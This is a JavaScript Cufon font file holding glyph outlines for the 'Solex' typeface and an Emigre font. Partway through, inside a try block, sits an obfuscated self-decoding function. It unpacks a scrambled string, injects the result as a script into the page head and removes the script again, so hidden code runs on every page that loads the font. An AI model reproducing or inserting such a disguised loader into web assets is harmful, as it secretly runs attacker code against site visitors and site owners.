-19,36r34,0xm76,-184v54,0,54,45,52,98r-72,0v-1,36,1,60,37,54v10,-2,20,-6,30,-12r0,36v-16,5,-30,12,-50,12v-50,-1,-58,-40,-58,-94v0,-54,8,-94,61,-94xm80,-205r-30,0r38,-48r32,0"},{"d":"87,4v-37,0,-63,-22,-63,-59r0,-193r43,0r0,191v0,14,7,21,22,21v15,0,22,-7,22,-21r0,-191r39,0r0,193v1,38,-26,59,-63,59","w":174},{"d":"118,-124v0,-48,-1,-89,-49,-86r0,66r25,0r0,35r-25,0r0,70v48,3,50,-38,49,-85xm162,-124v0,71,-16,125,-87,124r-49,0r0,-109r-26,0r0,-35r26,0r0,-104r49,0v72,-1,87,53,87,124","w":180},{"d":"16,-208r0,-29v12,-6,23,-13,43,-11r0,100r14,0r0,27r-57,0r0,-27r14,0r0,-67","w":97},{"d":"63,-89r0,123r-28,0r0,-123r28,0xm63,-248r0,122r-28,0r0,-122r28,0","w":98},{"d":"23,13r46,0r0,-256r-46,0r0,-23r73,0r0,302r-73,0r0,-23","w":137},{"d":"1,49v33,-38,65,-93,65,-164v0,-71,-32,-126,-65,-164r29,0v34,40,66,94,66,164v0,70,-32,124,-66,164r-29,0","w":119},{"d":"73,-179v53,0,77,50,52,88v24,39,3,95,-53,95v-20,0,-34,-5,-49,-9r0,-36v23,9,76,25,76,-13v0,-19,-8,-21,-27,-22v-53,10,-70,-50,-47,-85v-26,-42,-1,-104,61,-90v13,3,27,5,38,8r0,37v-21,-9,-69,-28,-73,7v1,15,6,20,22,20xm96,-108v11,-27,-7,-41,-40,-37v-17,25,10,39,40,37","w":151},{"d":"56,-90v-4,40,9,79,36,43r0,-86v-7,-5,-11,-15,-22,-16v-19,5,-11,33,-14,59xm137,-180v-8,57,-4,130,-4,194v0,64,-68,67,-107,46r0,-37v14,8,26,15,45,16v25,2,21,-27,21,-51v-8,7,-21,15,-33,16v-42,-4,-44,-47,-44,-94v0,-47,2,-94,44,-94v15,0,30,12,39,22v4,-16,18,-20,39,-18","w":151,"k":{"'":7}},{"d":"15,0v9,-74,2,-166,4,-248r41,0r0,80v8,-7,21,-15,33,-16v41,4,44,47,44,94v0,48,-2,94,-44,94v-15,0,-30,-12,-39,-22v-4,16,-18,20,-39,18xm96,-90v4,-40,-9,-79,-36,-43r0,86v7,5,11,15,22,16v19,-5,11,-33,14,-59","w":151,"k":{"'":16}},{"d":"90,-117v-1,-18,2,-36,-15,-36v-18,0,-19,14,-19,36r34,0xm76,-184v54,0,54,45,52,98r-72,0v-1,36,1,60,37,54v10,-2,20,-6,30,-12r0,36v-16,5,-30,12,-50,12v-50,-1,-58,-40,-58,-94v0,-54,8,-94,61,-94","k":{"'":11}},{"d":"99,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm44,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":141},{"d":"81,-214v-2,29,-24,43,-35,66r36,0r0,27r-64,0v-7,-48,30,-59,36,-93v-5,-17,-22,-4,-36,0r0,-28v24,-14,66,-11,63,28","w":97},{"d":"41,36r0,-302r74,0r0,23r-47,0r0,256r47,0r0,23r-74,0","w":137},{"w":64},{"d":"40,-180v6,5,12,12,16,21v11,-12,28,-26,44,-25v30,1,35,21,35,53r0,131r-41,0r0,-131v2,-24,-18,-17,-26,-5r-8,9r0,127r-41,0v-1,-60,4,-127,-4,-180r25,0","w":152,"k":{"'":13}},{"d":"87,4v-37,0,-63,-22,-63,-59r0,-193r43,0r0,191v0,14,7,21,22,21v15,0,22,-7,22,-21r0,-191r39,0r0,193v1,38,-26,59,-63,59xm91,-277r-30,0r38,-48r32,0","w":174},{"d":"8,-131v0,-56,57,-62,99,-43r0,36v-17,-9,-62,-26,-63,7v0,13,4,19,16,19v39,-1,57,19,57,58v0,58,-59,68,-102,49r0,-36v26,11,64,23,66,-13v0,-15,-8,-20,-22,-20v-36,0,-51,-19,-51,-57","w":124,"k":{"'":12}},{"d":"67,-48v-3,20,20,15,32,12r0,31v-9,2,-22,7,-37,7v-33,0,-36,-17,-36,-50r0,-100r-25,0r0,-32r25,0r0,-41r41,0r0,41r32,0r0,32r-32,0r0,100","w":102,"k":{"z":-4,".":-4}},{"d":"135,-67r0,26r-36,0r0,41r-43,0r0,-41r-36,0r0,-26r36,0r0,-24r-36,0r0,-26r29,0r-46,-131r45,0r32,104r34,-104r38,0r-46,131r29,0r0,26r-36,0r0,24r36,0","w":154},{"d":"119,-249v-1,22,-7,39,-28,39v-19,0,-23,-14,-37,-17v-8,1,-7,5,-9,14r-20,0v1,-23,7,-39,27,-40v20,-1,41,36,46,4r21,0xm75,-184v52,0,59,41,59,94v0,53,-7,94,-59,94v-52,0,-60,-40,-60,-94v0,-55,8,-94,60,-94xm75,-27v31,-7,16,-78,14,-115v-2,-8,-6,-10,-14,-11v-30,5,-18,61,-18,96v0,17,3,28,18,30","w":149},{"d":"58,-49v-2,24,19,17,27,5r5,-7r0,-129r41,0r0,194v9,65,-68,66,-107,46r0,-37v14,8,26,15,45,16v25,2,21,-28,21,-53v-29,33,-73,18,-73,-35r0,-131r41,0r0,131","w":150,"k":{"'":7}},{"d":"15,-180v28,-4,40,7,43,29v12,-11,30,-34,47,-33r0,52v-21,-9,-32,9,-45,18r0,114r-41,0v-1,-60,4,-127,-4,-180","w":105,"k":{".":14,",":18}},{"d":"87,4v-37,0,-63,-22,-63,-59r0,-193r43,0r0,191v0,14,7,21,22,21v15,0,22,-7,22,-21r0,-191r39,0r0,193v1,38,-26,59,-63,59xm114,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm59,-277v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":174},{"d":"57,-63r-22,0r0,-45r-26,0r0,-22r26,0r0,-53r-26,0r0,-22r26,0r0,-45r22,0r0,45r29,0r0,-45r22,0r0,45r26,0r0,22r-26,0r0,53r26,0r0,22r-26,0r0,45r-22,0r0,-45r-29,0r0,45xm57,-183r0,53r29,0r0,-53r-29,0"},{"d":"8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36","w":141,"k":{"'":18}},{"d":"54,-115v0,73,33,124,64,164r-28,0v-33,-41,-66,-92,-66,-164v0,-72,33,-123,66,-164r28,0v-31,39,-64,92,-64,164","w":119},{"d":"112,-249v-1,21,-6,39,-27,39v-21,0,-41,-35,-46,-3r-21,0v1,-22,8,-39,28,-40v19,0,42,36,46,4r20,0xm8,-49v3,-41,25,-65,73,-61v1,-20,1,-40,-19,-39v-19,1,-34,7,-47,15r0,-38v41,-19,107,-21,107,46v0,42,-3,91,4,126v-21,1,-32,0,-38,-16v-23,35,-84,21,-80,-33xm81,-78v-37,-11,-47,44,-21,51v10,-1,15,-9,21,-15r0,-36","w":141},{"d":"103,-165r-50,133r53,0r0,32r-101,0r0,-15r50,-133r-46,0r0,-32r94,0r0,15","w":110,"k":{"z":-4,"'":4}},{"d":"37,34r0,-282r23,0r0,282r-23,0","w":98},{"d":"82,-218v59,0,63,52,63,111v0,60,-5,111,-63,111v-57,0,-62,-52,-62,-111v0,-59,3,-111,62,-111xm102,-69v0,-41,14,-107,-20,-113v-33,7,-19,72,-19,113v0,19,0,36,19,36v20,0,20,-16,20,-36","w":164},{"d":"31,-115r0,-26r93,0r0,26r-93,0xm31,-57r0,-27r93,0r0,27r-93,0","w":154},{"d":"96,-90v4,-40,-9,-79,-36,-43r0,86v7,5,11,15,22,16v19,-5,11,-33,14,-59xm93,4v-12,-1,-25,-9,-33,-16r0,80r-41,0r0,-316r41,0r0,80v8,-8,20,-16,33,-16v42,0,44,47,44,94v0,48,-3,90,-44,94","w":151},{"d":"24,-197v0,-31,21,-51,52,-51v30,0,51,20,51,51v0,31,-22,48,-51,52v-29,-3,-52,-21,-52,-52xm101,-197v0,-13,-11,-25,-25,-25v-14,0,-26,12,-26,25v0,13,12,25,26,25v14,0,25,-12,25,-25","w":151},{"d":"68,-248r0,248r-42,0r0,-248r42,0","w":93},{"d":"23,-31r44,0r-25,89r-29,0xm70,-148v0,15,-14,28,-28,28v-14,0,-28,-13,-28,-28v0,-15,13,-28,28,-28v15,0,28,13,28,28","w":87},{"d":"66,-143v14,-37,35,-70,52,-105r41,0r-51,96r54,152r-45,0r-36,-105r-14,25r0,80r-41,0r0,-248r41,0","w":157,"k":{"O":4,"G":4,"C":4,";":-7,":":-7,".":-7,",":-7,"'":-2,"\"":5}},{"d":"125,-39r0,39r-99,0r0,-248r43,0r0,209r56,0","w":126,"k":{"Y":18,"W":13,"V":14,"U":4,"T":11,"S":4,"O":4,"G":4,"C":4,";":-7,":":-11,".":-11,",":-11,"'":29,"\"":29}},{"d":"66,0r-41,0r0,-148r-19,0r0,-32r60,0r0,180xm20,-228v0,-13,12,-24,25,-24v13,0,24,11,24,24v0,13,-11,25,-24,25v-14,0,-25,-11,-25,-25","w":88},{"d":"83,0r-43,0r0,-210r-43,0r0,-38r130,0r0,38r-44,0r0,210","w":123,"k":{"z":14,"y":18,"x":16,"w":14,"v":14,"u":18,"s":18,"r":14,"q":19,"p":14,"o":19,"n":14,"m":14,"g":19,"e":19,"d":19,"c":19,"a":19,"O":4,"G":4,"C":4,"A":7,";":7,":":7,".":11,",":11,"'":-11,"\"":-7}},{"d":"86,-252v66,0,69,59,69,128v0,69,-3,128,-69,128v-64,0,-68,-58,-68,-128v0,-70,4,-128,68,-128xm86,-36v43,-5,20,-84,25,-134v-3,-24,-1,-43,-25,-43v-35,0,-25,50,-25,89v0,39,-9,84,25,88","w":173,"k":{"Z":7,"Y":5,"X":4,"T":4}},{"d":"59,-184v12,0,25,9,33,16r0,-80r41,0r0,198v-1,16,2,37,4,50v-21,2,-36,-2,-39,-18v-10,10,-24,22,-39,22v-42,0,-44,-47,-44,-94v0,-47,2,-94,44,-94xm56,-90v-4,40,9,79,36,43r0,-86v-7,-5,-11,-15,-22,-16v-19,5,-11,33,-14,59","w":151},{"d":"55,-193v8,59,4,126,5,193r-34,0r0,-248r46,0r45,168v12,-59,29,-112,44,-168r46,0r0,248r-39,0r3,-163v1,-14,2,-15,3,-30r-50,193r-20,0","w":234},{"d":"128,-99r-40,-35r0,-32r80,59r0,16r-80,59r0,-32xm53,-99r-40,-35r0,-32r80,59r0,16r-80,59r0,-32","w":184},{"d":"127,-39r0,39r-101,0r0,-248r97,0r0,38r-54,0r0,60r50,0r0,39r-50,0r0,72r58,0"},{"d":"66,0r-41,0r0,-148r-19,0r0,-32r60,0r0,180xm65,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,17,7,17,17v0,10,-7,17,-17,17xm10,-205v-10,0,-17,-7,-17,-17v0,-10,7,-17,17,-17v10,0,16,7,16,17v0,10,-6,17,-16,17","w":88},{"d":"37,-223r-15,18r-30,0r38,-48r14,0r38,48r-30,0xm66,0r-41,0r0,-148r-19,0r0,-32r60,0r0,180","w":88},{"d":"55,-161v3,-19,-14,-14,-29,-15r0,-25v13,-1,29,4,27,-12v1,-20,-21,-7,-32,-6r0,-27v28,-10,64,-5,59,33v-1,11,-2,17,-6,24v19,21,12,69,-27,69v-11,0,-20,-1,-28,-5r0,-29v13,6,38,18,36,-7xm150,-248r26,0r-101,248r-26,0xm201,-51r0,21r-10,0r0,30r-29,0r0,-30r-38,0r0,-16r43,-81r24,0r0,76r10,0xm164,-85v-5,12,-11,23,-17,34r15,0","w":216}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+-7-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("wfNiO}6>-!0Tw)Wt%};rAfA0#x6iN}0T#xjr-!DVNZ4dm(>z#X9F.f9s#X9F.f2(#X9F.f.F#X9F.fmx#X9F.f6[#X9F.fjh#X9F.fms#X9F.fZEZisi.eg}mi6$%p*FNpN$%p*Fm(6$%p*FmEDX#X9F.fm>#X9F.f2xYVN$%p*Fm}N$%p*FNEW$%p*FNfNd#X9F.fN[_9h$#;si.egz6Wsi.eg[R;si.eghm!0$%p*Fm(W$%p*FNej$%p*FNeW$%p*Fmxj_!Wsi.eg[.Zsi.eg[6isi.egW6Zsi.egzmisi.eghmisi.egzR;si.egh.`g$%p*FNpj$%p*Fm(%l#X9F.f.>#X9F.fm(-`.x#X9F.fZhj(;$%p*FNph$%p*FN}N$%p*Fm!N$AWsi.eg[N;si.egz6isi.eg[6)mWm>3$%p*FNfj$%p*FmxN$%p*FmpD$%p*FNp*h#X9F.f`sO!N+#X9F.f9lnXh$%p*Fmx6$%p*FmE`q2}*a%Zsi.eg}mWsi.egEmZsi.egW6;si.eg}R;si.eg}6isi.egWN)i$%p*FNEj$%p*Fm(N$%p*Fm!j$%p*Fm!ZD#X9F.f6W$e%$%p*Fm(ZY#)0!1;si.egE.ED$%p*Fm(;^#X9F.fNh^isi.egz6Zsi.eg[NYDm#X9F.*g)e`;fXAjw1.6Rn2DYp9Z!#mN-O$%^_vhzE[W}V:?+udJTCFsr(>ixlq3Pt40LafA(wWsi.egh.E6$%p*FmpWfREj$%p*Fmp6$%p*FNe9u#X9F.fmFDXq31[`i$Zsi.egzN;si.egWm}J2!p3$%p*Fm(h$%p*FNpWZ#X9F.f2F#X9F.fA3#X9F.f`x#YW$%p*Fmp%Vm}Z$%p*Fmph$%p*FmEjOAf3$%p*FNf;(%;si.egh6Zsi.eg}6#Wr#X9F.fDEAx`:#X9F.f9(^VFFnZsi.eg}NZsi.egz.`[tY>s?Z`0[pZsi.egzm[Z$%p*FN!N$%p*FN!Z$%p*Fm}9z1V6FOfW>w)AzwYs?np*d$eiz1V*dOeiF1}sWO}%>-)sVn!ATNz3VOXWF-X.0^l>t-!m:mz3C-(>C#zvaRV%l%iFTwp4:n(?JNfih#)3zNY[[1x[T%fZ(%)hdOx6h%fWCOz3:Ol6>O};JNY[?N}0rweJ?nfFtwrJ?w!%OmiJ?#Z>0$;J?##>?w)[v")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":142,"face":{"font-family":"Solex","font-weight":700,"font-stretch":"normal","units-per-em":"360","panose-1":"2 0 8 6 3 0 0 2 0 4","ascent":"281","descent":"-79","x-height":"4","bbox":"-13 -360 234 73.2078","underline-thickness":"10.8","underline-position":"-26.28","unicode-range":"U+0020-U+00FF"}}));
/*!
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Copyright (C) 2000, Emigre Inc.; Designed by Zuzana Licko
 * 
 * Manufacturer:
 * C) Emigre Inc
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"176,-244v58,20,28,131,14,179v-16,54,-73,82,-138,61v-57,-19,-28,-132,-14,-180v15,-53,76,-81,138,-60xm133,-231v-87,0,-90,85,-97,157v-4,42,17,57,59,57v87,0,90,-85,97,-158v4,-42,-17,-56,-59,-56xm68,-84v7,-54,7,-134,75,-118v6,1,12,4,17,7r-6,34v-15,-13,-44,-18,-46,11v-2,23,-15,51,-6,73v15,4,27,-6,39,-11r-6,35v-28,15,-72,12,-67,-31","w":216},{"d":"152,0r40,-193r-26,65r-58,128r-19,0r-16,-193v-3,71,-18,129,-28,193r-35,0r44,-248r44,0r15,168v22,-59,50,-112,75,-168r47,0r-43,248r-40,0","w":234},{"d":"54,-113v57,15,-17,138,58,137r-4,21v-63,3,-66,-61,-56,-122v-2,-19,-17,-24,-33,-30r3,-17v63,-4,47,-97,83,-127v17,-14,36,-25,59,-25r-4,25v-76,1,-41,120,-106,138","w":133},{"d":"31,-154v17,14,44,7,36,-19v-5,-6,-17,-2,-26,-3r5,-25v17,3,34,-3,28,-21v-9,-5,-19,2,-30,3v4,-12,-1,-31,17,-30v43,-16,54,35,29,61v23,35,-15,89,-64,63xm178,-248r26,0r-145,248r-26,0xm194,-51r-4,21r-10,0r-5,30r-28,0r6,-30r-39,0r3,-16r57,-81r23,0r-13,76r10,0xm156,-51v2,-12,5,-23,8,-34v-7,12,-15,23,-23,34r15,0","w":216},{"d":"131,-67r-4,26r-37,0r-7,41r-43,0r8,-41r-36,0r4,-26r36,0r4,-24r-36,0r5,-26r29,0r-23,-131r43,0r14,105r53,-105r39,0r-69,131r29,0r-5,26r-36,0r-4,24r36,0","w":154},{"d":"134,0v-24,0,-50,4,-51,-19v-27,31,-85,36,-73,-30r23,-131r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0xm97,-205r-31,0r46,-48r33,0","w":150},{"d":"173,-321v-1,34,-40,52,-62,25v-10,-7,-15,0,-18,11r-21,0v3,-35,40,-53,62,-25v10,7,15,0,18,-11r21,0xm120,-74v1,-64,17,-116,25,-174r36,0r-43,248r-36,0r-30,-174v-2,64,-16,116,-25,174r-37,0r44,-248r36,0","w":179},{"d":"5,13r46,0r45,-256r-46,0r4,-23r73,0r-53,302r-74,0","w":137},{"d":"134,0v-24,0,-50,4,-51,-19v-27,31,-85,36,-73,-30r23,-131r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0","w":150,"k":{"z":-7,"'":7}},{"d":"75,-32r-6,32r-60,0r26,-148r-19,0r6,-32r60,0r-26,148r19,0xm86,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm30,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":90},{"d":"144,-206v-24,-16,-86,-22,-71,23v30,7,80,8,68,61v-2,14,-10,23,-18,31v30,64,-43,121,-115,85r6,-35v28,18,95,15,76,-30v-29,-8,-82,-3,-68,-60v3,-13,10,-23,17,-30v-26,-66,41,-114,112,-81xm102,-140v-9,-5,-46,-11,-43,9v-7,27,21,17,40,23v6,-6,9,-26,3,-32"},{"d":"6,-41v25,18,81,15,66,-29v-19,-8,-54,-1,-58,-34v-9,-65,50,-99,107,-69r-6,35v-20,-17,-77,-19,-62,22v18,8,53,4,58,34v11,66,-49,107,-111,76","w":124,"k":{"'":12}},{"d":"20,-113r123,0r-5,28r-123,0xm72,-139v-14,-20,16,-44,33,-28v13,19,-15,45,-33,28xm53,-32v-14,-20,17,-44,33,-27v14,18,-17,45,-33,27","w":154},{"d":"62,-223r-18,18r-32,0r47,-48r14,0r30,48r-30,0xm75,-32r-6,32r-60,0r26,-148r-19,0r6,-32r60,0r-26,148r19,0","w":90},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm111,-162v7,-14,19,-21,42,-18v-22,66,-26,154,-47,222v-12,35,-76,36,-107,18r7,-36v17,16,62,25,67,-7r5,-29v-26,26,-75,17,-68,-33v7,-56,8,-132,64,-139v14,1,29,12,37,22","k":{"'":7}},{"d":"77,-137v38,7,48,-31,42,-63v-4,-9,-15,-11,-29,-10xm157,-32r-6,32r-50,0r-14,-98r-17,0r-17,98r-43,0r44,-248v63,-6,123,2,108,76v-6,32,-16,47,-37,61r13,79r19,0","w":170,"k":{"Y":11,"T":7,".":-7,",":-7,"'":11}},{"d":"158,-200v-16,-14,-57,-27,-63,7r-8,45r51,0r-6,35r-51,0r-13,74r66,0r-7,39r-124,0r7,-39r17,0r13,-74r-17,0r6,-35r17,0v9,-50,11,-104,70,-104v20,0,36,7,49,12","w":154},{"d":"135,-123v-6,26,-17,50,-45,51v-25,1,-45,-44,-57,-5r-27,0v6,-27,17,-51,45,-51v21,0,28,19,44,23v10,-2,7,-7,13,-18r27,0","w":142},{"d":"19,36r53,-302r74,0r-4,23r-47,0r-45,256r47,0r-4,23r-74,0","w":137},{"d":"161,-32r-69,-59r3,-16r90,-59r-6,34r-46,34r34,35xm86,-32r-69,-59r2,-16r90,-59r-5,34r-46,34r34,35","w":184},{"d":"72,-32r-5,32r-60,0r38,-216r-19,0r6,-32r60,0r-38,216r18,0","w":88,"k":{"z":-4,".":-4}},{"d":"68,-150v-58,-34,-4,-116,53,-94v32,13,29,65,4,83v-14,10,-38,22,-57,11xm120,-197v4,-21,-24,-34,-40,-18v-17,10,-15,43,10,43v14,0,28,-13,30,-25"},{"d":"126,-216v0,47,-8,99,-58,99v-24,0,-37,-11,-37,-36v0,-47,7,-100,58,-99v25,0,37,12,37,36xm86,-227v-24,7,-21,48,-24,77v1,5,2,8,9,7v24,-5,19,-51,24,-76v0,-6,-5,-7,-9,-8","w":123},{"d":"53,-60v-6,38,35,24,52,12r-7,42v-33,14,-91,15,-87,-36v5,-66,14,-160,95,-137v8,2,15,4,21,7r-7,38v-10,-6,-18,-11,-31,-11v-34,0,-32,53,-36,85","w":118,"k":{"'":4}},{"d":"77,-36v45,-10,34,-77,48,-125r-64,117v3,5,8,8,16,8xm125,-201v-6,-20,-38,-12,-41,5v-12,30,-20,76,-25,117xm168,-186v0,88,-24,223,-128,181r-13,23r-21,0r20,-37v-23,-60,7,-160,30,-205v14,-28,65,-37,92,-18r13,-24r21,0r-22,40v5,10,8,23,8,40","w":173},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139xm82,-253r30,48r-29,0r-32,-48r31,0"},{"d":"103,-144r-6,35r-25,0r-12,70v63,3,62,-68,69,-124v4,-31,-7,-50,-39,-47r-12,66r25,0xm3,-109r6,-35r27,0r18,-104v66,-5,121,6,118,71v-3,84,-15,177,-106,177r-56,0r20,-109r-27,0","w":180},{"d":"134,-250r23,0r-146,252r-23,0","w":132},{"d":"21,-161r67,-87r23,0r36,87r-39,0r-14,-47r-32,47r-41,0","w":141},{"d":"-19,19r3,-19r155,0r-3,19r-155,0","w":154},{"d":"175,-7v-28,11,-85,23,-93,-15v-20,36,-96,36,-81,-27v9,-40,33,-66,84,-63v4,-15,9,-38,-12,-37v-20,1,-35,7,-50,15r7,-38v23,-10,68,-20,88,-1v36,-23,103,-9,83,47r-8,45r-72,0v-6,30,-6,56,28,49v10,-2,21,-6,33,-12xm160,-112v5,-18,8,-51,-17,-39v-12,6,-13,23,-17,39r34,0xm40,-32v23,15,43,-18,40,-49v-32,-5,-45,21,-40,49","w":209},{"d":"66,49v-35,-46,-55,-141,-25,-209v20,-46,48,-87,81,-119r30,0v-77,57,-137,224,-58,328r-28,0","w":119},{"d":"111,-295r-18,18r-31,0r46,-48r14,0r30,48r-29,0xm118,-39r-7,39r-101,0r44,-248r97,0r-7,38r-54,0r-10,60r50,0r-7,39r-51,0r-12,72r58,0","w":142},{"d":"95,-117v2,-20,9,-36,-9,-36v-20,0,-19,15,-25,36r34,0xm109,-7v-34,16,-102,19,-98,-35v4,-62,10,-142,80,-142v56,0,47,54,36,98r-72,0v-6,33,-9,61,28,54v10,-2,21,-6,33,-12xm97,-253r30,48r-29,0r-32,-48r31,0","w":142},{"d":"53,-63r-22,0r8,-45r-27,0r4,-22r26,0r10,-53r-26,0r3,-22r26,0r9,-45r22,0r-9,45r29,0r8,-45r22,0r-8,45r26,0r-4,22r-26,0r-9,53r26,0r-4,22r-26,0r-8,45r-22,0r8,-45r-29,0xm74,-183r-10,53r29,0r9,-53r-28,0","w":142},{"d":"84,-5v-22,7,-73,18,-69,-18v4,-42,15,-85,21,-125r-24,0r5,-32r25,0r7,-41r41,0r-7,41r31,0r-5,32r-32,0v-5,38,-18,75,-17,113v5,4,23,1,29,-1","w":102,"k":{"z":-4,".":-4}},{"d":"116,-165r-72,133r52,0r-6,32r-101,0r2,-15r72,-133r-44,0r6,-32r94,0","w":110,"k":{"z":-4,".":-4,"'":4}},{"d":"134,0v-24,0,-50,4,-51,-19v-27,31,-85,36,-73,-30r23,-131r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0xm92,-253r30,48r-29,0r-32,-48r31,0","w":150},{"d":"96,-248r-44,248r-42,0r44,-248r42,0xm108,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm52,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":93},{"d":"65,-45v13,11,39,8,41,-11v1,-16,18,-57,-8,-55r-21,0r7,-39v33,8,38,-29,33,-54v-12,-17,-40,-1,-38,18r-33,186r-40,0r33,-186v1,-58,69,-84,111,-49v20,27,6,87,-18,99v45,42,8,170,-74,132","w":162},{"d":"99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v11,1,25,8,31,16r15,-80r41,0r-38,216r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139","k":{"z":-7,".":-7}},{"d":"96,-223r-18,18r-31,0r46,-48r15,0r30,48r-30,0xm134,0v-24,0,-50,4,-51,-19v-27,31,-85,36,-73,-30r23,-131r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-26,148r19,0","w":150},{"d":"92,-223r-18,18r-32,0r47,-48r14,0r30,48r-29,0xm99,-134v-4,-11,-23,-24,-30,-7v-10,24,-26,80,-14,109v14,4,20,-9,29,-16xm74,-184v14,1,29,12,37,22v7,-14,19,-21,42,-18v-15,43,-21,99,-30,148r18,0r-5,32r-40,0v-5,-3,-9,-11,-11,-18v-11,9,-25,22,-41,22v-26,0,-37,-20,-34,-49v5,-56,8,-132,64,-139"},{"d":"118,-39r-7,39r-101,0r44,-248r97,0r-7,38r-54,0r-10,60r50,0r-7,39r-51,0r-12,72r58,0xm135,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm79,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":142},{"d":"15,34r51,-282r23,0r-50,282r-24,0","w":98},{"d":"105,-32r19,0r-6,32r-45,0r-14,-54r-35,54r-39,0r61,-91r-17,-57r-19,0r6,-32r46,0r12,51r33,-51r39,0r-59,86","w":134,"k":{".":-4}},{"d":"118,-295r-18,18r-31,0r46,-48r15,0r29,48r-29,0xm20,0r-38,0r102,-248r47,0r15,248r-43,0r-2,-56r-59,0xm99,-94r1,-116r-43,116r42,0","w":161},{"d":"116,-141v0,-20,-11,-30,-34,-27r-15,87v40,5,49,-27,49,-60xm97,-248r-8,41v94,-11,80,134,20,158v-13,5,-29,8,-49,7r-7,42r-43,0r44,-248r43,0","w":155},{"d":"140,-173v-23,-16,-86,-22,-71,23v33,4,78,9,67,64v-7,33,-25,49,-57,54r-8,46r-25,0r8,-45v-16,-1,-26,-4,-38,-8r6,-36v31,17,92,15,75,-30v-22,-8,-63,0,-67,-34v-5,-44,14,-78,57,-78r8,-46r25,0r-8,46v12,1,25,5,35,8","w":154},{"d":"126,-295r-18,18r-32,0r47,-48r14,0r30,48r-29,0xm95,-248r-34,191v-2,14,4,21,19,21v15,0,23,-7,25,-21r34,-191r40,0r-35,193v1,60,-106,83,-125,24v-2,-7,-3,-15,-1,-24r35,-193r42,0","w":174},{"d":"19,43v10,8,41,20,44,0v2,-11,-10,-13,-23,-12r17,-40r21,0r-11,24v35,15,10,62,-22,58v-12,-1,-21,-6,-29,-11","w":147},{"d":"95,-248r-34,191v-2,14,4,21,19,21v15,0,23,-7,25,-21r34,-191r40,0r-35,193v1,60,-106,83,-125,24v-2,-7,-3,-15,-1,-24r35,-193r42,0xm146,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm90,-277v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":174},{"d":"77,-14v-13,16,-56,28,-66,4v-7,-56,16,-116,22,-170r41,0r-23,131v-4,26,15,15,26,5r7,-7r22,-129r41,0r-34,194v-2,58,-69,70,-116,46r7,-36v17,15,64,27,68,-7xm123,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17xm67,-205v-16,1,-18,-22,-7,-29v10,-10,30,-3,27,12v-2,9,-10,17,-20,17","w":150},{"d":"81,-132v-15,22,-66,18,-55,-24v7,-28,25,-48,62,-45v2,-9,5,-23,-7,-23v-15,0,-29,6,-41,12r6,-32v31,-12,87,-16,76,34v-6,29,-12,58,-13,90v-13,0,-26,0,-28,-12xm84,-175v-17,-1,-27,3,-28,19v-2,21,17,12,24,3","w":115},{"d":"1,0v3,-67,53,-98,91,-133v13,-12,22,-47,-10,-45v-23,1,-32,8,-52,15r8,-43v42,-19,120,-20,106,46v-13,60,-69,77,-95,121r77,0r-7,39r-118,0","w":147},{"d":"37,-208r5,-29v13,-5,24,-13,45,-11r-18,100r14,0r-5,27r-56,0r4,-27r14,0r12,-67xm174,-248r27,0r-145,248r-27,